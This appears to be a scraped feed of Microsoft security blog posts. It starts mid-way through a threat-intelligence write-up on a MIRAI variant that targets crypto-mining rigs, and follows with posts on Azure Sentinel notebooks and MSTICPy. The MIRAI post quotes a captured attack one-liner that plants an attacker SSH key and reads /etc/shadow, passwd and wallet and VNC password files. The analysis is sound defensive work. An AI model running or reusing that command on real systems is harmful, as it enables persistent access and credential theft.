seems to have improved significantly on the default MIRAI-esq command execution flow by using XML tags. This at least hints at some improved backend handling for this botnet.</P> <P>&nbsp;</P> <P>Fairly generic recon behaviour then follows. Yet unlike other MIRAI botnet attacks the bot master is actively searching for specific coin miner configurations in specific locations, in this case, in the ‘ethos’ directory. EthOS is a Linux distribution built specifically for mining Ethereum,&nbsp;Zcash and Monero. It looks like this distribution is of high interest to the attacker.</P> <P>At time of writing no other MIRAI variant or other Linux malware could be found specifically checking for this operating system – at least in this way.</P> <P>&nbsp;</P> <P>In the final stages of the attack the bot tries to gain root privileges with ‘sudo’ and inspect the status of the firewall. Again, this kind of probing is unusual given the large number of MIRAI variants Microsoft has been in the past.</P> <P>Of the few hundred brute force attacks we’ve seen only two user accounts were attempted – ‘admin’ and ‘osmc.’ Most MIRAI bots tend to try a large number of common user accounts. The ‘osmc’ might related to the OSMC media player project which does use ‘osmc’ as a <A href="#" target="_blank" rel="noopener">default username / password combination</A>.</P> <P>&nbsp;</P> <P>MIRAI reconnaissance payloads often come with a later infection. This installs malware which continues the pattern of brute forcing, in these cases we didn’t see any further activity from the IPs that launched the attack or to specific brute forced credentials from other IP addresses. Our assumption here is that the actor is only interested in specific coin mining infrastructure.</P> <P>&nbsp;</P> <H2>The attack</H2> <P>Here is an example of the attack we collected.</P> <PRE>mkdir -p /home/admin/.ssh/ ; echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF &gt;&gt; /home/admin/.ssh//authorized_keys ; echo '&lt;cmd7uname&gt;'; uname -a ; echo '&lt;/cmd7uname&gt;&lt;cmd7uptime&gt;'; uptime ; echo '&lt;/cmd7uptime&gt;&lt;cmd7w&gt;'; w ; echo '&lt;/cmd7w&gt;&lt;cmd7who&gt;'; who ; echo '&lt;/cmd7who&gt;&lt;cmd7last&gt;'; last ; echo '&lt;/cmd7last&gt;&lt;cmd7lastlog&gt;'; lastlog ; echo '&lt;/cmd7lastlog&gt;&lt;cmd7authkey&gt;'; cat /home/admin/.ssh//authorized_keys ; echo '&lt;/cmd7authkey&gt;&lt;cmd7lshome&gt;'; ls -la /home ; echo '&lt;/cmd7lshome&gt;&lt;cmd7passwd&gt;'; cat /etc/passwd ; echo '&lt;/cmd7passwd&gt;&lt;cmd7shadow&gt;'; sudo -n cat /etc/shadow ; echo '&lt;/cmd7shadow&gt;&lt;cmd7psfaux&gt;'; ps -faux ; echo '&lt;/cmd7psfaux&gt;&lt;cmd7netstat&gt;'; netstat -npta ; echo '&lt;/cmd7netstat&gt;&lt;cmd7arpan&gt;'; /usr/sbin/arp -an ; echo '&lt;/cmd7arpan&gt;&lt;cmd7ifconfig&gt;' ; /usr/sbin/ifconfig ; echo '&lt;/cmd7ifconfig&gt;&lt;cmd7localconf&gt;'; cat /home/ethos/local.conf ; echo '&lt;/cmd7localconf&gt;&lt;cmd7remoteconf&gt;' ; cat /home/ethos/remote.conf ; echo '&lt;/cmd7remoteconf&gt;&lt;cmd7rclocal&gt;' ; cat /etc/rc.local ; echo '&lt;/cmd7rclocal&gt;&lt;cmd7claymorestub&gt;'; cat /home/ethos/claymore.stub.conf ; cat /hive-config/rig.conf; cat /hive-config/wallet.conf ; cat /hive-config/vnc-password.txt ; echo '&lt;/cmd7claymorestub&gt;&lt;cmd7claymorezstub&gt;' ; cat /home/ethos/claymore-zcash.stub.conf ; echo '&lt;/cmd7claymorezstub&gt;&lt;cmd7sgminerconf&gt;' ; cat /var/run/ethos/sgminer.conf ; echo '&lt;/cmd7sgminerconf&gt;&lt;cmd7iptables&gt;' ; sudo -n iptables -S&nbsp; &amp;&amp; sudo -n iptables -t nat -S ; echo '&lt;/cmd7iptables&gt;&lt;cmdcrontab&gt;'; crontab -l; echo '&lt;/cmdcrontab&gt;' ; exit</PRE> <P>&nbsp;</P> <H2>Results</H2> <P>The results of clustering Linux malware installation patterns to aid in rapidly understanding new threats is something that Microsoft is continuing to support. Improving the speed and agility of defenders is key to the detection community as well as our own Linux detection product - Azure Defender and <A href="#" target="_blank" rel="noopener">Azure Defender for IoT</A>. Adding new SSH keys, crypto mining and unusual logins from suspicious IP addresses are already covered by <A href="#" target="_blank" rel="noopener">multiple existing detections</A>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="alert.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310817i2E1A66CB10DA880E/image-size/large?v=v2&amp;px=999" role="button" title="alert.png" alt="alert.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Microsoft’s Threat Intelligence Center proactively uses data sources and techniques such as those described here to discover emerging threats, as well as to ensure that our detection coverage is relevant to the attacks facing both Microsoft and its customers.</P> Fri, 17 Sep 2021 15:26:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/unusual-mirai-variant-looks-for-mining-infrastructure/ba-p/2756669 robeving 2021-09-17T15:26:09Z Azure Sentinel Notebooks Ninja Part 2: Getting Started with Azure Sentinel Notebooks https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-2-getting-started-with-azure/ba-p/2716661 <P><EM><SPAN class="TextRun Highlight SCXW109037511 BCX8" data-contrast="none"><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">This installment is part of&nbsp;</SPAN><SPAN class="NormalTextRun CommentStart SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">a broader&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">learning&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">series to&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">help you become</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">&nbsp;a Jupyter Notebook ninja in Azure Sentinel</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">.&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">The installments will be bite-sized to enable you to easily digest the new content.</SPAN></SPAN></EM><SPAN class="EOP SCXW109037511 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 1:</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">What are notebooks and when&nbsp;do you need them</SPAN></A><SPAN data-contrast="auto">?</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 2:</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;How to get started with notebooks and tour&nbsp;the features&nbsp;–&nbsp;</SPAN><STRONG><I><SPAN data-contrast="auto">this&nbsp;post</SPAN></I></STRONG><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 3:&nbsp;</SPAN></STRONG><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="auto">Overview of the pre-built notebooks and how to use them</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 4:&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">How to create your own notebooks from scratch and how&nbsp;to customize the existing ones</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN>&nbsp;</LI> </UL> <H2>&nbsp;</H2> <H2><SPAN data-contrast="none">Getting Started&nbsp;with Azure Sentinel Notebooks</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:1,&quot;335559739&quot;:400,&quot;335559740&quot;:400}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As we discussed in&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Part 1</SPAN></A><SPAN data-contrast="auto">&nbsp;of this series, the&nbsp;Jupyter&nbsp;Notebook&nbsp;service&nbsp;is a powerful tool and an integral part of Azure Sentinel.&nbsp;It provides additional capability&nbsp;to help augment areas&nbsp;where Azure Sentinel may not scale as well.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Through our discussion with customers, we’ve noted that many have expressed interest in learning more&nbsp;about this topic.&nbsp;And&nbsp;most importantly, many want to know how&nbsp;to incorporate&nbsp;notebooks&nbsp;into&nbsp;the&nbsp;daily regimen to improve SOC workflows through&nbsp;enhanced investigation, threat hunting, and machine learning.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">If you’ve never used Jupyter notebooks before it&nbsp;can&nbsp;feel daunting and&nbsp;seem&nbsp;a bit&nbsp;like&nbsp;a&nbsp;black box.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Many of our&nbsp;pre-built notebooks rely on a Python library called&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><I><SPAN data-contrast="none">MSTICPy</SPAN></I></A><SPAN data-contrast="auto">.&nbsp;Originally developed&nbsp;by Microsoft&nbsp;to support Jupyter Notebooks authoring for Azure Sentinel,&nbsp;MSTICPy&nbsp;(</SPAN><I><SPAN data-contrast="auto">Microsoft Threat Intelligence Python Security Tools</SPAN></I><SPAN data-contrast="auto">)&nbsp;is a Python library&nbsp;that addresses three primary requirements for security investigators and hunters:&nbsp;&nbsp;acquiring and enriching data,&nbsp;analyzing data, and&nbsp;visualizing data.&nbsp;MSTICPy&nbsp;serves to reduce the amount of code that would have to be written using other Python libraries that aren’t tailored for security.&nbsp;While Azure Sentinel on its own provides&nbsp;the&nbsp;ability to&nbsp;do much of the same,&nbsp;Jupyter&nbsp;Notebooks with&nbsp;MSTICpy&nbsp;provides deeper functionality in the following&nbsp;specific areas:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Querying log data from&nbsp;multiple sources&nbsp;at once including Azure Sentinel and external sources like data lake, blob storage, third party providers, et al</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Enriching the data with Threat Intelligence, geolocations and Azure resource data</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Extracting Indicators of Activity (IoA) from logs and unpack encoded data</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><SPAN data-contrast="auto">Performing sophisticated analysis such as anomalous session detection and time series decomposition</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><SPAN data-contrast="auto">Visualizing data using interactive timelines, process trees and multi-dimensional Morph Charts</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><SPAN data-contrast="auto">Includes time-saving notebook tools such as widgets to set query time boundaries, select and display items from lists, and configure the notebook environment</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">Ideally, the best way to get started is to become comfortable with a few of the “quick start” notebooks that we’ve provided as part of the Azure Sentinel out-of-the-box experience.&nbsp;For our efforts in this blog post, we want to introduce you properly&nbsp;using the&nbsp;Getting Started Guide notebook that’s supplied&nbsp;in Azure Sentinel.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Understanding how&nbsp;MSTICPy&nbsp;fits into the scheme of the Azure Sentinel notebooks is important, as&nbsp;most Azure Sentinel notebooks start by initializing&nbsp;MSTICPy&nbsp;to define the minimum version for Python and&nbsp;MSTICPy,&nbsp;installing the latest version of&nbsp;MSTICPy&nbsp;if needed, and&nbsp;then running the&nbsp;<EM>init_notebook</EM>&nbsp;function.&nbsp;See the&nbsp;</SPAN><I><SPAN data-contrast="auto">More reading/tutorial resources</SPAN></I><SPAN data-contrast="auto">&nbsp;section at the bottom of this&nbsp;blog post&nbsp;for the steps to accomplish this and more.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2><SPAN data-contrast="none">Take a Tour</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:1,&quot;335559739&quot;:400,&quot;335559740&quot;:400}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Our Docs teams are second-to-none. And, as such have provided some amazing guidance around using the Getting Started notebook, including&nbsp;running and initializing to adding threat intelligence and GeoIP provider settings to running queries to authenticating to your Azure Sentinel workspace from your notebook.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Please use the following article on our Docs platform to deliver a self-guided tour:&nbsp;&nbsp;</SPAN><A href="#" target="_self"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Tutorial: Get started with Jupyter notebooks and MSTICPy in Azure Sentinel</SPAN></A></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">We also have a video tutorial for&nbsp;Getting Started with Azure Sentinel ML Notebooks.&nbsp;This tutorial guides you through the basic steps of using notebooks for security analysis. It covers all the basic steps you need to understand to start using the notebooks provided with Azure Sentinel.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><LI-VIDEO vid="https://youtu.be/SaEQJfoe8Io" align="center" size="medium" width="400" height="225" uploading="false" thumbnail="https://i.ytimg.com/vi/SaEQJfoe8Io/hqdefault.jpg" external="url"></LI-VIDEO></SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">RECOMMENDED:</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;<EM>After</EM>&nbsp;working through the&nbsp;“</SPAN><I><SPAN data-contrast="auto">Getting Started</SPAN></I><SPAN data-contrast="auto">”&nbsp;notebook to setup the Azure Sentinel Notebook environment, consider digging directly into the “</SPAN><I><SPAN data-contrast="auto">A Tour of Cybersec notebook features</SPAN></I><SPAN data-contrast="auto">” notebook.&nbsp;This notebook walks through some of the features of Azure Sentinel notebooks and&nbsp;MSTICPy. The notebook&nbsp;introduces&nbsp;the data queries, visualization, data analysis, enrichment with threat intelligence and pivot functions. It can be run against&nbsp;the&nbsp;Azure Sentinel workspace or&nbsp;run as&nbsp;standalone&nbsp;using&nbsp;sample data.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tour.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/307925i3F7496D7395ACF32/image-size/large?v=v2&amp;px=999" role="button" title="tour.png" alt="tour.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Notebooks, like all other components and features for Azure Sentinel, are&nbsp;under&nbsp;constant review and&nbsp;undergoing&nbsp;constant improvement.&nbsp;Improvements and changes come from&nbsp;feedback and suggestions from our customers.&nbsp;Since our first blog post in this series, we’ve created a special email DL just for Azure Sentinel Notebooks. You can use this DL to send your questions, issues, and feedback and our various product teams will monitor and respond. The DL to use is&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">asinotebooks@service.microsoft.com</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Don’t forget to sign up to attend the upcoming public-facing,&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">free training series for Azure Sentinel Notebooks</SPAN></STRONG><SPAN data-contrast="auto">. For those that have already registered, the first session is scheduled for&nbsp;September 30, 2021. If you want to be included in additional training sessions, register using the form.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">To register visit <A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars,</A> look for <STRONG>Azure Sentinel | Become a Notebooks ninja</STRONG> webinar and fill out the registration form.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We are super-excited to be bringing this series (and the training) to you! Look for more great knowledge on Azure Sentinel Notebooks as we prepare to deliver Part 3 of this series:&nbsp;</SPAN><I><SPAN data-contrast="auto">Overview of the pre-built notebooks and how to use them</SPAN></I><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">More reading/tutorial resources:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"><A class="Hyperlink SCXW39567267 BCX8" href="#" target="_blank" rel="noopener noreferrer"><SPAN class="FieldRange SCXW39567267 BCX8"><SPAN class="TextRun Underlined SCXW39567267 BCX8" data-contrast="none"><SPAN class="NormalTextRun CommentStart SCXW39567267 BCX8" data-ccp-charstyle="Hyperlink">Getting Started with Jupyter Notebooks in Azure Sentinel</SPAN></SPAN></SPAN></A><SPAN class="EOP SCXW39567267 BCX8" data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="12" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">MSTIC Jupyter and Python Security Tools</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="12" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN>Run and initialize the Getting Started Guide notebook</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="12" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Configure the Getting Started Guide notebook</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI><A href="#" target="_blank" rel="noopener nofollow noreferrer">Azure Sentinel Weekly Newsletter</A></LI> </UL> <P><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> Tue, 05 Oct 2021 11:57:16 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-2-getting-started-with-azure/ba-p/2716661 rodtrent 2021-10-05T11:57:16Z Azure Sentinel Notebooks - Azure cloud support, new visualizations https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-azure-cloud-support-new-visualizations/ba-p/2751268 <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The 1.4.2 release of MSTICPy includes three major features/updates:</P> <UL class="postList"> <LI class="graf graf--li">Support for Azure sovereign clouds for Azure Sentinel, Key Vault, Azure APIs, Azure Resource Graph and Azure Sentinel APIs</LI> <LI class="graf graf--li">A new visualization — the Matrix plot</LI> <LI class="graf graf--li">Significant update to the Process Tree visualization allowing you to use process data from Microsoft Defender for Endpoint, and generic process data from other sources.</LI> </UL> <P class="graf graf--p">We have also consolidated our visualizations into a single <EM>pandas</EM> accessor to make them easier to invoke from any DataFrame.</P> <P class="graf graf--p">&nbsp;</P> <H4 class="graf graf--h4">Important Note:</H4> <P class="graf graf--p">If you’ve installed <STRONG class="markup--strong markup--p-strong">release 1.4.0</STRONG> or <STRONG>1.4.1</STRONG>&nbsp;of MSTICPy, please upgrade to <STRONG class="markup--strong markup--p-strong">v1.4.3</STRONG> or later— a lot of the functionality described below didn’t make it into the 1.4.0 release due to a publisher (i.e. me) error!</P> <P class="graf graf--p">&nbsp;</P> <H2 class="graf graf--h3">Azure sovereign cloud&nbsp;support</H2> <P class="graf graf--p">What is an Azure sovereign cloud? Unless you are using one, you may not know. Most Azure customers use the Azure <EM class="markup--em markup--p-em">global </EM>cloud — this includes the public portal and Azure APIs typically located in the&nbsp;<EM class="markup--em markup--p-em">.azure.com</EM> domain namespace. However, there are a set of independent clouds with their own authentication, storage and other infrastructure — these may be used where there is a strict data residency requirement like that of Germany. Currently supported Azure clouds are:</P> <UL class="postList"> <LI class="graf graf--li">global — the Azure public cloud</LI> <LI class="graf graf--li">cn — China</LI> <LI class="graf graf--li">de — Germany</LI> <LI class="graf graf--li">usgov — US Government</LI> </UL> <P class="graf graf--p">I wasn’t able to find a single document that describes Azure sovereign clouds but this overview of the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">US Government cloud</A> will give you a reasonable understanding.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">For systems accessing a sovereign cloud it’s critical that they use a consistent set of endpoints to authenticate and access resources belonging to that cloud.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The updates to MSTICPy allow you to specify the cloud that you’re using in your&nbsp;<CODE class="markup--code markup--p-code">msticpyconfig.yaml</CODE> file. Once this is done, all of the Azure components used by MSTICPy will select the correct endpoints for authentication, resource management and API use.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">To set the correct cloud for your organization, run the MpConfigEdit configuration editor and select the <STRONG class="markup--strong markup--p-strong">Azure</STRONG> tab.</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">from msticpy import MpConfigEdit<BR />mp_conf = MpConfigEdit()<BR />mp_conf</PRE> <FIGURE class="graf graf--figure"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ianhelle_0-1631669321123.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310466i32195B05442B8516/image-size/large?v=v2&amp;px=999" role="button" title="ianhelle_0-1631669321123.png" alt="Azure configuration in MSTICPy Configuration editor" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure configuration in MSTICPy Configuration editor</span></span> <P>&nbsp;</P> </FIGURE> <P class="graf graf--p">The top half of the tab lets you select from the global, China (cn), Germany (de) and US government (usgov) clouds. The lower half, lets you select default authentication methods for Azure authentication (see below).</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">After you save the settings (you need to hit the <STRONG>Save</STRONG> button to confirm your choices, then the&nbsp;<STRONG class="markup--strong markup--p-strong">Save Settings</STRONG> button to write the settings to your configuration file), you can reload the settings and start using them.</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">import msticpy<BR />msticpy.settings.refresh_config()</PRE> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">Unfortunately, there isn’t anything very spectacular to see with this feature — other than for people using sovereign clouds (in which case, the MSTICPy Azure functions will begin working as they do for global cloud users).</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The MSTICPy components affected by this are:</P> <UL class="postList"> <LI class="graf graf--li">Azure Sentinel data provider (and the underlying Kqlmagic library)</LI> <LI class="graf graf--li">Azure Key Vault for secret storage</LI> <LI class="graf graf--li">Azure Data provider</LI> <LI class="graf graf--li">Azure Sentinel APIs</LI> <LI class="graf graf--li">Azure Resource graph provider</LI> </UL> <P>&nbsp;</P> <H3 class="graf graf--h4">Azure default authentication methods</H3> <P class="graf graf--p">In the same Azure settings tab, you can also specify the default authentication methods that you want to use. MSTICPy uses <EM class="markup--em markup--p-em">ChainedCredential</EM> authentication, allowing a sequence of different authentication methods to be tried in turn. The available methods are:</P> <UL class="postList"> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">env</STRONG> — Use credentials set in environment variables</LI> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">cli</STRONG> — Using credentials available in an local AzureCLI logon</LI> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">msi</STRONG> — Using the Managed Service Identity (MSI) credentials of the machine you are running the notebook kernel on</LI> <LI class="graf graf--li"><STRONG class="markup--strong markup--li-strong">interactive</STRONG> — Interactive browser logon</LI> </UL> <P class="graf graf--p">You can select one or more of these. This gives you more flexibility when signing in. For example, if you have <STRONG class="markup--strong markup--p-strong">cli </STRONG>and <STRONG class="markup--strong markup--p-strong">interactive </STRONG>enabled, MSTICPy will try to obtain an access token via an existing Azure CLI session, if there is one, otherwise will fall back to using interactive browser logon.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The first three methods refer to credentials available on the Jupyter server (e.g., an Azure ML Compute) and not necessarily on the machine on which your browser is running. For example, if you want to use Azure CLI credentials you must run <CODE class="markup--code markup--p-code">az login</CODE> on the Jupyter server, not on the machine you are browsing from.</P> <P class="graf 